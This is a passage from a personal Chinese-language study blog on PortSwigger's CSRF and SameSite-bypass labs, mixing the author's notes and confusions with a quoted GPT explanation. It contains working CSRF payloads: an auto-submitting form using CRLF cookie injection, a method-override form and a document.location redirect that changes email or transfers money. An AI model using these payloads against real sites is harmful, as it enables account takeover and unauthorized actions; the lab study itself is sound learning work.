class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">CSRF where token is tied to non-session cookie</span><br><span class="line">Back to lab description  </span><br><span class="line">LAB</span><br><span class="line">Solved</span><br><span class="line"></span><br><span class="line">Congratulations, you solved the lab!</span><br><span class="line">Share your skills!   Continue learning</span><br><span class="line">This is your server. You can use the form below to save an exploit, and send it to the victim.</span><br><span class="line"></span><br><span class="line">Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp&#x27;s Browser or Chrome.</span><br><span class="line"></span><br><span class="line">Craft a response</span><br><span class="line">URL: https://exploit-0a5900ef038eda50807d02ea01cb0090.exploit-server.net/exploit</span><br><span class="line"></span><br><span class="line">HTTPS</span><br><span class="line"></span><br><span class="line">File:</span><br><span class="line">/exploit</span><br><span class="line">Head:</span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Content-Type: text/html; charset=utf-8</span><br><span class="line">Body:</span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://0a7700d2035ada7180ec03c100100083.web-security-academy.net/my-account/change-email&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;1133<span class="symbol">&amp;#64;</span>1<span class="symbol">&amp;#46;</span>cn&quot;</span> /&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;csrf&quot;</span> <span class="attr">value</span>=<span class="string">&quot;UMnkihPvgGFpIxvQ5YH1jeoUFyBPtaeL&quot;</span> /&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit request&quot;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;https://0a7700d2035ada7180ec03c100100083.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=0fZX8oTxa8mv114Ng4C0zol1JNsXSbUK%3b%20SameSite=None&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;document.forms[0].submit()&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li>
<li>很不解，cookie中的csrfkey似乎更换账号了也没有变。而且一开始我把url替换成了上述用来注入的url，不行。换成<code>/exploit</code>即可</li>
<li>很怪很怪，好像YouTube的视频上压根没url注入<code>csrfKey</code>这步？<br>这里的Note提到，上述的这种<code>cookie-setting behavior</code>甚至不需要存在于，跟CSRF漏洞所在的，相同的web application中。相同的总DNS域即可，举例：<code>staging.demo.normal-website.com</code>和<code>secure.normal-website.com</code></li>
</ol>
<h3 id="CSRF-token-is-simply-duplicated-in-a-cookie"><a href="#CSRF-token-is-simply-duplicated-in-a-cookie" class="headerlink" title="CSRF token is simply duplicated in a cookie"></a>CSRF token is simply duplicated in a cookie</h3><p>有些应用甚至不维护token记录，只是验证cookie和参数中的令牌是否相符。被叫做<code>double submit</code>。比较方便实现。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">POST /email/change HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 68</span><br><span class="line">Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa</span><br><span class="line"></span><br><span class="line">csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&amp;email=wiener@normal-user.com</span><br></pre></td></tr></table></figure>
<p>这种情况，攻击者甚至都不用获得一个有效的token（我理解是，因为服务器没有去维护记录了），只要符合格式就行。然后利用cookie-setting 行为把cookie放到受害者浏览器中，完成CSRF攻击即可。</p>
<h4 id="Lab-CSRF-where-token-is-duplicated-in-cookie"><a href="#Lab-CSRF-where-token-is-duplicated-in-cookie" class="headerlink" title="Lab: CSRF where token is duplicated in cookie"></a>Lab: CSRF where token is duplicated in cookie</h4><ol>
<li>这里随便改下浏览器中cookie，和HTML中的value即可。但是问题是邮件地址修改成功，可以还是没有solve，是因为我直接F12改cookie的问题吗？</li>
<li>可能是，构造相应URL，修改cookie，然后与上一个实验相同。</li>
<li>不明白为什么这里由<code>&lt;script&gt;</code>变成了<code>&lt;img src...</code></li>
<li>另：其中需要修改的参数较多，不要遗漏。<blockquote>
<p>GPT 给我的答案是：</p>
<p>使用 <code>&lt;img&gt;</code> 标签是因为：</p>
<ol>
<li><code>&lt;img&gt;</code> 标签会导致浏览器尝试加载一张图片，这时可以利用 <code>src</code> 属性发起一个 GET 请求到目标站点。</li>
<li>当图片加载失败时（在这种情况下，因为服务器的响应不会是有效的图片），<code>onerror</code> 事件会被触发。</li>
<li>在 <code>onerror</code> 事件中，可以添加 JavaScript 代码，比如提交一个表单，这样就可以在成功注入 CSRF 令牌后自动发起 CSRF 攻击。</li>
</ol>
<p>这种方法不使用 <code>&lt;script&gt;</code> 标签的原因是因为它不需要执行任何复杂的 JavaScript，只是简单地利用了浏览器的行为来设置 cookie 并在错误时提交表单。这是一种更加隐蔽的攻击方式，因为它不涉及直接的脚本执行，而是使用了浏览器解析 HTML 和处理错误时的自然行为。</p>
<p>这是一个基于 CRLF（回车换行符）注入的漏洞，它允许攻击者在响应中注入额外的头信息。在这个例子中，通过搜索参数 <code>?search=test%0d%0a</code>，后面跟着的是编码后的 CRLF（%0d%0a），然后是 <code>Set-Cookie:</code> 头，攻击者可以设置一个新的 <code>csrfKey</code> cookie。</p>
</blockquote>
</li>
</ol>
<p>怨不得YouTube上的视频我没有看到点击url的部分，这里利用CRLF漏洞实现的注入header。我画蛇添足了属于是。还是因为学艺不精。</p>
<h1 id="Bypassing-SameSite-cookie-restrictions"><a href="#Bypassing-SameSite-cookie-restrictions" class="headerlink" title="Bypassing SameSite cookie restrictions"></a>Bypassing SameSite cookie restrictions</h1><blockquote>
<p>SameSite is a browser security mechanism that determines when a website’s cookies are included in requests originating from other websites.</p>
</blockquote>
<p>SameSite 不仅能够防御CSRF，还能防御cross-site leaks，CORS 漏洞。反正就是多种跨站攻击都能防御。</p>
<h2 id="What-is-a-site-in-the-context-of-SameSite-cookies"><a href="#What-is-a-site-in-the-context-of-SameSite-cookies" class="headerlink" title="What is a site in the context of SameSite cookies?"></a>What is a site in the context of SameSite cookies?</h2><blockquote>
<p>a site is defined as the top-level domain (TLD), usually something like <code>.com</code> or <code>.net</code>, plus one additional level of the domain name. This is often referred to as the TLD+1.<br><img src="https://portswigger.net/web-security/csrf/images/site-definition.png"></p>
</blockquote>
<p>除了顶级域之外，还会考虑<code>URL scheme</code>即协议。</p>
<blockquote>
<p>这里的note提到了”effective top-level domain(eTLD)”，就是多个后缀组成的顶级域名，像<code>.co.uk</code>。我还能举出来个<code>.cn.com</code></p>
</blockquote>
<h2 id="What’s-the-difference-between-a-site-and-an-origin"><a href="#What’s-the-difference-between-a-site-and-an-origin" class="headerlink" title="What’s the difference between a site and an origin?"></a>What’s the difference between a site and an origin?</h2><p>origin和site之间还是有区别的：site有多个domain name，而一个origin只有一个。同源( same origin)的条件是:{scheme , domain name , port}这个三元组相同。[[白帽子讲Web安全#5 深入同源策略]]，same site的要求就没这么严苛了，只需要判断scheme 和last part of the domain name。这就意味着，cross-<strong>origin</strong> request 仍然可以是same site，反过来则不对。</p>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions">网页</a>上也提供了一个表格来展示一些例子。</p>
<h2 id="How-does-SameSite-work"><a href="#How-does-SameSite-work" class="headerlink" title="How does SameSite work?"></a>How does SameSite work?</h2><p>SameSite机制（？） 允许浏览器和网站所有者限制跨站请求是否包含特定cookies。这就可以保护用户免受CSRF攻击。</p>
<p>主流浏览器都支持如下SameSite 限制级别：</p>
<ul>
<li><code>Strict</code></li>
<li><code>Lax</code></li>
<li><code>None</code><br>开发者可以针对每个cookie设置相应的限制级别<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: session=0F8tgdOhi9ynR1M9wa3ODa; SameSite=Strict</span><br></pre></td></tr></table></figure>
虽然这些限制可以提供一些保护，但不是就高枕无忧了。<blockquote>
<p>Note指出，如果cookie没有显式地设置<code>SameSite</code>，Chrome会默认成<code>Lax</code><br>听他这语气，好像别的浏览器并没有遵循这一点。</p>
</blockquote>
</li>
</ul>
<h3 id="Strict"><a href="#Strict" class="headerlink" title="Strict"></a>Strict</h3><p>任何跨站请求都不会送。适合持有cookie就可以执行敏感操作的。但是一些情况下会影响用户体验。</p>
<h3 id="Lax"><a href="#Lax" class="headerlink" title="Lax"></a>Lax</h3><p>以下条件满足时才会发送cookie：</p>
<ul>
<li>使用<code>GET</code>方法</li>
<li>请求来自用户的顶级操作，比如：点击一个链接。<br>这种情况下，<code>POST</code>请求就不行，background requests也不会包含。</li>
</ul>
<h3 id="None"><a href="#None" class="headerlink" title="None"></a>None</h3><p>就完全没限制了。不使用SameSite机制（？）也是有理由的，比方说cookie就是用来和第三方网站交互，不会赋予持有者敏感操作的权限啦。追踪cookie就是个典型的例子。</p>
<blockquote>
<p>When setting a cookie with <code>SameSite=None</code>, the website must also include the <code>Secure</code> attribute<br>以此来保证cookie只通过https以密文方式传送，否则浏览器不认。</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: trackingId=0F8tgdOhi9ynR1M9wa3ODa; SameSite=None; Secure</span><br></pre></td></tr></table></figure>
<h2 id="Bypassing-SameSite-Lax-restrictions-using-GET-requests"><a href="#Bypassing-SameSite-Lax-restrictions-using-GET-requests" class="headerlink" title="Bypassing SameSite Lax restrictions using GET requests"></a>Bypassing SameSite Lax restrictions using GET requests</h2><p>即便是使用<code>Lax</code>限制等级，也能够诱导受害者产生<code>GET</code>请求。只要request涉及top-level navigation ,浏览器还是会（在发送请求时）包含受害者的cookie。如下例：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="property">location</span> = <span class="string">&#x27;https://vulnerable-website.com/account/transfer-payment?recipient=hacker&amp;amount=1000000&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>即便是有些情况下不允许GET请求，一些基础组件也能提供一些方式去覆盖“the method specified in the request line”。</p>
<p>举例：Symfony就支持在forms中定义<code>_method</code>参数，“which takes precedence over the normal method for routing purposes”</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;https://vulnerable-website.com/account/transfer-payment&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;_method&quot;</span> <span class="attr">value</span>=<span class="string">&quot;GET&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;recipient&quot;</span> <span class="attr">value</span>=<span class="string">&quot;hacker&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;amount&quot;</span> <span class="attr">value</span>=<span class="string">&quot;1000000&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="Lab-SameSite-Lax-bypass-via-method-override"><a href="#Lab-SameSite-Lax-bypass-via-method-override" class="headerlink" title="Lab: SameSite Lax bypass via method override"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions">SameSite</a> Lax bypass via method override</h4><ol>
<li>emmm,我怎么判断frameworks是否用了Symfony呢？</li>
<li>先是简单修改了method，结果不行。</li>
<li>尝试像上例一样添加参数，结果不行，看来瞎碰运气是不行的。<br>看了solution，其中指出如下几点：</li>
</ol>
<ul>
<li>看了<code>POST /my-account/change-email</code> request注意到没有任何不能预测的token，所以如果能绕过SameSite就能实现CSRF攻击。</li>
<li>看了response to your <code>POST /login</code> request ， 也没显式地指明限制等级，所以默认使用<code>Lax</code></li>
<li>Recognize that this means the session cookie will be sent in cross-site <code>GET</code> requests, as long as they involve a top-level navigation.</li>
<li>题解中也是指出，先发送GET请求，结果发现服务端只允许POST请求。尝试去添加<code>_method</code>参数：<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/my-account/change-email?email=foo%40web-security-academy.net&amp;_method=POST</span> <span class="meta">HTTP/1.1</span></span><br></pre></td></tr></table></figure></li>
<li>发送后发现成功修改邮件地址，证明可行。</li>
<li>最后的payload是这样的：<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="property">location</span> = <span class="string">&quot;https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&amp;_method=POST&quot;</span>;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="Bypassing-SameSite-restrictions-using-on-site-gadgets"><a href="#Bypassing-SameSite-restrictions-using-on-site-gadgets" class="headerlink" title="Bypassing SameSite restrictions using on-site gadgets"></a>Bypassing SameSite restrictions using on-site gadgets</h2><p>在cookies被设置成SameSite&#x3D;Strict情况下，”You may be able to get around this limitation if you can find a gadget that results in a secondary request within the same site.”</p>
<p>这里提到的一个gadget就是a client-side redirect，它会使用攻击者输入，像URL参数，动态地构建重定向的目标。</p>
<p>但是这些服务端的重定向，会被视为常规的，单独的request。重点是，这是same-site 请求，并且会包含cookies，而不考虑限制。</p>
<p>但是server-side 重定向是没办法实现上述bypass的，这种情况下请求就得遵循跨站重定向规则，所以还是有cookie限制。</p>
<h4 id="Lab-SameSite-Strict-bypass-via-client-side-redirect"><a href="#Lab-SameSite-Strict-bypass-via-client-side-redirect" class="headerlink" title="Lab: SameSite Strict bypass via client-side redirect"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions">SameSite</a> Strict bypass via client-side redirect</h4><p>这个利用流程较为复杂，而且我对于“Identify a suitable gadget”毫无头绪。它这个整个判断的流程，让我很是迷惑。</p>
<h2 id="Bypassing-SameSite-restrictions-via-vulnerable-sibling-domains"><a href="#Bypassing-SameSite-restrictions-via-vulnerable-sibling-domains" class="headerlink" title="Bypassing SameSite restrictions via vulnerable sibling domains"></a>Bypassing SameSite restrictions via vulnerable sibling domains</h2><p>这里又再次提到，尽管一个请求是cross-origin，它也可能是same-site的。</p>
<p>这里就是强调要考虑整个可能的攻击面，包括各种旁站(sibling domains)。不然，一些能够诱导产生任意次要请求的漏洞，就可能完全地损害site-based defenses，让整个网站都暴露在跨站攻击之下。</p>
<p>同时还提到，如果目标站点支持WebSockets，也可能存在，<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking">cross-site WebSocket hijacking</a> (<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking">CSWSH</a>)漏洞，这里说，这个玩意本质上就是“a CSRF attack targeting a WebSocket handshake”</p>
<h4 id="Lab-SameSite-Strict-bypass-via-sibling-domain"><a href="#Lab-SameSite-Strict-bypass-via-sibling-domain" class="headerlink" title="Lab: SameSite Strict bypass via sibling domain"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions">SameSite</a> Strict bypass via sibling domain</h4><blockquote>
<p>This lab’s live chat feature is vulnerable to <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking">cross-site WebSocket hijacking</a> (<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking">CSWSH</a>).</p>
</blockquote>
<p>emmmm,再议吧。</p>
<h2 id="Bypassing-SameSite-Lax-restrictions-with-newly-issued-cookies"><a href="#Bypassing-SameSite-Lax-restrictions-with-newly-issued-cookies" class="headerlink" title="Bypassing SameSite Lax restrictions with newly issued cookies"></a>Bypassing SameSite Lax restrictions with newly issued cookies</h2><p>“Cookies with <code>Lax</code> SameSite restrictions aren’t normally sent in any cross-site <code>POST</code> requests, but there are some exceptions.”</p>
<p>这里提到chrome，（为了兼容旧问题，我猜的？），为了避免破坏single sign-on(SSO)机制，在最开始的120秒对于top-level <code>POST</code> requests 实际上不会强制限制。这就有两分钟的“窗口”，用户可能遭到跨站攻击。</p>
<blockquote>
<p>这里的Note提到，如果显式地设置了<code>SameSite=Lax</code>，是没有这两分钟的。</p>
</blockquote>
<p>接下来，就涉及到刷新cookies和认证相关工作，没大看懂。我想，至此，CSRF部分结束。</p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E7%9F%A5%E8%AF%86-cybersecurity/" rel="tag"><i class="fa fa-tag"></i> 知识/cybersecurity</a>
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
              <a href="/tags/CSRF/" rel="tag"><i class="fa fa-tag"></i> CSRF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/Notes/Leetcode%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" rel="prev" title="Leetcode刷题记录">
      <i class="fa fa-chevron-left"></i> Leetcode刷题记录
    </a></div>
      <div class="post-nav-item">
    <a href="/Notes/XSS%20vs%20CSRF/" rel="next" title="XSS vs CSRF">
      XSS vs CSRF <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-CSRF"><span class="nav-number">1.</span> <span class="nav-text">What is CSRF?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-the-impact-of-a-CSRF-attack"><span class="nav-number">2.</span> <span class="nav-text">What is the impact of a CSRF attack?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-does-CSRF-work"><span class="nav-number">3.</span> <span class="nav-text">How does CSRF work?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-construct-a-CSRF-attack"><span class="nav-number">4.</span> <span class="nav-text">How to construct a CSRF attack</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-vulnerability-with-no-defenses"><span class="nav-number">4.0.1.</span> <span class="nav-text">Lab: CSRF vulnerability with no defenses</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-deliver-a-CSRF-exploit"><span class="nav-number">5.</span> <span class="nav-text">How to deliver a CSRF exploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Common-defences-against-CSRF"><span class="nav-number">6.</span> <span class="nav-text">Common defences against CSRF</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Bypassing-CSRF-token-validation"><span class="nav-number"></span> <span class="nav-text">Bypassing CSRF token validation</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-a-CSRF-token"><span class="nav-number">1.</span> <span class="nav-text">What is a CSRF token?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Common-flaws-in-CSRF-token-validation"><span class="nav-number">2.</span> <span class="nav-text">Common flaws in CSRF token validation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Validation-of-CSRF-token-depends-on-request-method"><span class="nav-number">2.1.</span> <span class="nav-text">Validation of CSRF token depends on request method</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-where-token-validation-depends-on-request-method"><span class="nav-number">2.1.1.</span> <span class="nav-text">Lab: CSRF where token validation depends on request method</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Validation-of-CSRF-token-depends-on-token-being-present"><span class="nav-number">2.2.</span> <span class="nav-text">Validation of CSRF token depends on token being present</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-where-token-validation-depends-on-token-being-present"><span class="nav-number">2.2.1.</span> <span class="nav-text">Lab: CSRF where token validation depends on token being present</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF-token-is-not-tied-to-the-user-session"><span class="nav-number">2.3.</span> <span class="nav-text">CSRF token is not tied to the user session</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-where-token-is-not-tied-to-user-session"><span class="nav-number">2.3.1.</span> <span class="nav-text">Lab: CSRF where token is not tied to user session</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF-token-is-tied-to-a-non-session-cookie"><span class="nav-number">2.4.</span> <span class="nav-text">CSRF token is tied to a non-session cookie</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-where-token-is-tied-to-non-session-cookie"><span class="nav-number">2.4.1.</span> <span class="nav-text">Lab: CSRF where token is tied to non-session cookie</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF-token-is-simply-duplicated-in-a-cookie"><span class="nav-number">2.5.</span> <span class="nav-text">CSRF token is simply duplicated in a cookie</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-CSRF-where-token-is-duplicated-in-cookie"><span class="nav-number">2.5.1.</span> <span class="nav-text">Lab: CSRF where token is duplicated in cookie</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Bypassing-SameSite-cookie-restrictions"><span class="nav-number"></span> <span class="nav-text">Bypassing SameSite cookie restrictions</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-a-site-in-the-context-of-SameSite-cookies"><span class="nav-number">1.</span> <span class="nav-text">What is a site in the context of SameSite cookies?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What%E2%80%99s-the-difference-between-a-site-and-an-origin"><span class="nav-number">2.</span> <span class="nav-text">What’s the difference between a site and an origin?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-does-SameSite-work"><span class="nav-number">3.</span> <span class="nav-text">How does SameSite work?</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Strict"><span class="nav-number">3.1.</span> <span class="nav-text">Strict</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Lax"><span class="nav-number">3.2.</span> <span class="nav-text">Lax</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#None"><span class="nav-number">3.3.</span> <span class="nav-text">None</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bypassing-SameSite-Lax-restrictions-using-GET-requests"><span class="nav-number">4.</span> <span class="nav-text">Bypassing SameSite Lax restrictions using GET requests</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-SameSite-Lax-bypass-via-method-override"><span class="nav-number">4.0.1.</span> <span class="nav-text">Lab: SameSite Lax bypass via method override</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bypassing-SameSite-restrictions-using-on-site-gadgets"><span class="nav-number">5.</span> <span class="nav-text">Bypassing SameSite restrictions using on-site gadgets</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-SameSite-Strict-bypass-via-client-side-redirect"><span class="nav-number">5.0.1.</span> <span class="nav-text">Lab: SameSite Strict bypass via client-side redirect</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bypassing-SameSite-restrictions-via-vulnerable-sibling-domains"><span class="nav-number">6.</span> <span class="nav-text">Bypassing SameSite restrictions via vulnerable sibling domains</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Lab-SameSite-Strict-bypass-via-sibling-domain"><span class="nav-number">6.0.1.</span> <span class="nav-text">Lab: SameSite Strict bypass via sibling domain</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Bypassing-SameSite-Lax-restrictions-with-newly-issued-cookies"><span class="nav-number">7.</span> <span class="nav-text">Bypassing SameSite Lax restrictions with newly issued cookies</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yijian</p>
  <div class="site-description" itemprop="description">Just for fun :D</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/91Quin" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;91Quin" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:YijianCS@outlook.com" title="E-Mail → mailto:YijianCS@outlook.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">鲁ICP备2021011592号-1 </a>
      <img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403011809721.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=37020202001534" rel="noopener" target="_blank">鲁公网安备37020202001534号 </a>
  </div>

<div class="copyright">
  
  &copy; 2021 – 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yijian</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


